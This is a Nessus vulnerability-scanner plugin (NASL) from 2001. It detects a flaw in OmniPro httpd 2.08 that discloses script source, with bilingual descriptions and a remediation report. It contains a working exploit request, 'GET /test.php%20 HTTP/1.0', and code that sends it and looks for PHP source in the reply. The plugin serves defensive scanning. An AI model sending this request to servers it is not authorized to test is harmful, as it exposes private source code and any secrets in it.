#
# This script was written by Gregory Duchemin <plugin@intranode.com>
#
# See the Nessus Scripts License for details
#


#### REGISTER SECTION ####

if(description)
{


script_id(10716);

#Name used in the client window.

name["english"] = "OmniPro httpd 2.08 scripts source full disclosure";
name["francais"] = "OmniPro httpd 2.08 rvle le source des scripts.";
script_name(english:name["english"], francais:name["francais"]);


#Description appearing in the Nessus client window when clicking on the name.

desc["english"]="
OmniPro httpd 2.08 suffers from a security vulnerability permitting 
malicious users to get full source of scripting files.
By appending an ascii/unicode space char '%20' at the script suffixe, 
the web server does no longer interpret it and rather send it back clearly 
as a simple document to the user in the same manner as it usually does to 
process html like files.
The flaw does not work with files located in cgi directories (e.g cgibin, 
cgi-win)

Exploit: GET /test.php%20 HTTP/1.0


Vulnerable systems: up to release 2.08


Immune system: unknown


Risk factor : Medium
Solution: The vendor is aware of the problem but so far, no 
patch was made available.
It is recommended to move all scripting files from non executable directories.";
desc["francais"]="
OmniPro httpd 2.08 contient une faille de scurit permettent  un utilisateur 
malicieux de tlcharger le source des scripts au lieu de visualiser le rsultat de leur interprtation.
En ajoutant un caractre ascii/unicode d'espacement apres le suffixe du nom de 
fichier, le serveur considre qu'il s'agit d'un document standard  diffuser 
immdiatement.

Exploit: GET /test.php%20 HTTP/1.0


Version vulnrable: jusqu' la version 2.08


Version saine: inconnue


Facteur de risque: Des informations sensibles peuvent se trouver dans le source de 
scripts et ainsi faire varier la gravit de la faille.


Solution:
Le vendeur est au courant du problme mais  ce jour aucun patch n'a t 
rendu public, il est donc conseill de retirer tous les fichiers scripts des 
rpertoires non excutables.";
script_description(english:desc["english"], francais:desc["francais"]);




#Summary appearing in the tooltips, only one line. 

summary["english"]="Check the presence of OmniPro httpd 2.08 scripts source disclosure.";
summary["francais"]="Vrifie la prsence de la faille du server OmniPro httpd 2.08.";	
script_summary(english:summary["english"], francais:summary["francais"]);


#Test among the firsts scripts, no risk to harm the remote host.

script_category(ACT_GATHER_INFO);



#CVE Index number

#script_cve_id("");



#Copyright stuff

script_copyright(english:"INTRANODE - 2001");

#Category in wich attack must be stored.

family["english"]="CGI abuses";
family["francais"]="Abus de CGI";
script_family(english:family["english"], francais:family["francais"]);


#Portscan the target and get back.

script_dependencie("find_service.nes", "no404.nasl");


#optimization, 
#Check the presence of at least one listening web server.

script_require_ports(80, "Services/www");
 
exit(0);
}


#### ATTACK CODE SECTION ####

#Mandatory

function check_header(probe, port)
{ 
soc = http_open_socket(port);
if(!soc) return(0); 

 request = http_get(item:probe, port:port); 
 send(socket:soc, data:request);
 response = recv(socket:soc, length:4096);
 close(soc); 

 regex_signature[0] = "^Server: OmniHTTPd.*$";

if (egrep(pattern:regex_signature[0], string:response)) return(1);
else return(0);

}



function check(poison, port)
{ 
soc = http_open_socket(port);
if(!soc) return(0); 

 request = http_get(item:poison, port:port); 
 send(socket:soc, data:request);
 response = recv(socket:soc, length:4096);
 close(soc); 

 regex_signature[2] = "<?"; 


# here, a php signature.

if (regex_signature[2] >< response) return(1);
else return(0);

}




#search web port in knowledge database
#default is port 80

port=get_kb_item("Services/www");
if (!port) port=80;

if(!get_port_state(port)) exit(0);


Egg[0] = "%20 ";
signature[0] = "test.php";

probe=string("/");
if (!check_header(item:probe, port:port)) exit(0);


poison=string("/", signature[0], Egg[0]);

if (check(item:poison, port:port))
{
report="OmniPro httpd web server is online and contains a security 
vulnerability that allows anybody to see php, ssi and shtml scripts sources.
Nessus was able to get a complete php source from your server.
OmniPro are vulnerable up to version 2.08, please check the official website 
for the lastest release/patch : http://www.omnicron.com
If no patch are made available, you should, at least, remove all your scripts 
from non executable directories.

Solution : none yet
Risk factor : Medium";
security_hole(port:port, data:report);
}
else
{
report="
OmniPro httpd web server is online but nessus could not detect its release number.
Because there is a serious security vulnerability permitting a full disclosure 
of php/shtml/pl scripts in 2.08 versions, we recommend you to quicly check the version you are
currently running and if vulnerable, to look at the official Omnicron website: http://www.omnicron.com ";
security_warning(port:port, data:report);
}

